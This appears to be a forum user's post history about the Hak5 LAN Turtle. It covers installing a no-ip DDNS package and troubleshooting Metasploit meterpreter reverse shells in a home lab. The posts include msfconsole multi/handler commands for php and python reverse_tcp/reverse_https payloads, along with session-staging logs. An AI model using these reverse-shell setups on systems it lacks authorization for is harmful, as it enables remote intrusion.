Jump to content

F0X4C1D

Members
  • Posts

    4
  • Joined

  • Last visited

Everything posted by F0X4C1D

  1. This package had a major update and now you need to download additional packages in some cases to make work. For "noip.com" I did this: wget https://downloads.openwrt.org/releases/packages-19.07/x86_64/packages/ddns-scripts_no-ip_com_2.7.8-14_all.ipk opkg install ddns-scripts_no-ip_com_2.7.8-14_all.ipk Then you configure the module like this: Service: no-ip.com Domain: ****.ddns.net User: [your_username] Password: [your_password] People should have a look here as I'm not sure this module works "natively" with LAN Turtle.
  2. It opens sessions in loop (I'm not sure to understand why...) but nevermind, I tried to open a session (session Id 1) in order to use the command shell but it doesn't work... Can you help me?
  3. Hello, It's going to be two days that I try to operate my meterpreter module for my LAN Turtle but so far unsuccessfully. In short my network configuration: my kali linux machine 10.10.10.118, my lan turtle 10.10.10.117. I followed meticulously the video tutorial from Darren here with some prerequisites regardings the metasploit database. msfdb init service postgresql start service postgresql status msfconsole use exploit/multi/handler set PAYLOAD php/meterpreter/reverse_tcp set LHOST 10.10.10.118 set LPORT 4444 set ExitOnSession false show options exploit -j And I got the error below: msf6 exploit(multi/handler) > [*] Sending stage (39282 bytes) to 10.10.10.117 [-] Meterpreter session 1 is not valid and will be closed [*] - Meterpreter session 1 closed. [*] Sending stage (39282 bytes) to 10.10.10.117 [-] Meterpreter session 2 is not valid and will be closed [*] - Meterpreter session 2 closed. [*] Sending stage (39282 bytes) to 10.10.10.117 [-] Meterpreter session 3 is not valid and will be closed [*] - Meterpreter session 3 closed. [*] Sending stage (39282 bytes) to 10.10.10.117 [-] Meterpreter session 4 is not valid and will be closed [*] - Meterpreter session 4 closed. [*] Sending stage (39282 bytes) to 10.10.10.117 I know this tutorial is a little outdated (2017) and the paypload suggested by the module (Help section) is slightly different... so I followed this tutorial. use exploit/multi/handler set PAYLOAD python/meterpreter/reverse_https set SessionExpirationTimeout 604800 set LHOST 10.10.10.118 set LPORT 4444 set ExitOnSession false show options exploit -j And I got the error below: msf6 exploit(multi/handler) > [*] Started HTTPS reverse handler on https://10.10.10.118:4444 [*] https://10.10.10.118:4444 handling request from 10.10.10.117; (UUID: womnpkkv) Staging python payload (39568 bytes) ... [*] https://10.10.10.118:4444 handling request from 10.10.10.117; (UUID: womnpkkv) Staging python payload (39528 bytes) ... [*] https://10.10.10.118:4444 handling request from 10.10.10.117; (UUID: womnpkkv) Staging python payload (39540 bytes) ... [-] Meterpreter session 1 is not valid and will be closed [*] - Meterpreter session 1 closed. [*] https://10.10.10.118:4444 handling request from 10.10.10.117; (UUID: womnpkkv) Staging python payload (39548 bytes) ... [-] Meterpreter session 2 is not valid and will be closed [*] - Meterpreter session 2 closed. [*] https://10.10.10.118:4444 handling request from 10.10.10.117; (UUID: womnpkkv) Staging python payload (39580 bytes) ... [*] https://10.10.10.118:4444 handling request from 10.10.10.117; (UUID: womnpkkv) Staging python payload (39604 bytes) ... [-] Meterpreter session 3 is not valid and will be closed [*] - Meterpreter session 3 closed. [*] https://10.10.10.118:4444 handling request from 10.10.10.117; (UUID: womnpkkv) Staging python payload (39596 bytes) ... [-] Meterpreter session 4 is not valid and will be closed [*] - Meterpreter session 4 closed. When in doubt, I setup a new Kali Linux VM (kali-linux-2021.1-vbox-amd64.ova) to start from scratch, and this time, when I configure to use the payload python/meterpreter/reverse_https, I got this:
×
×
  • Create New...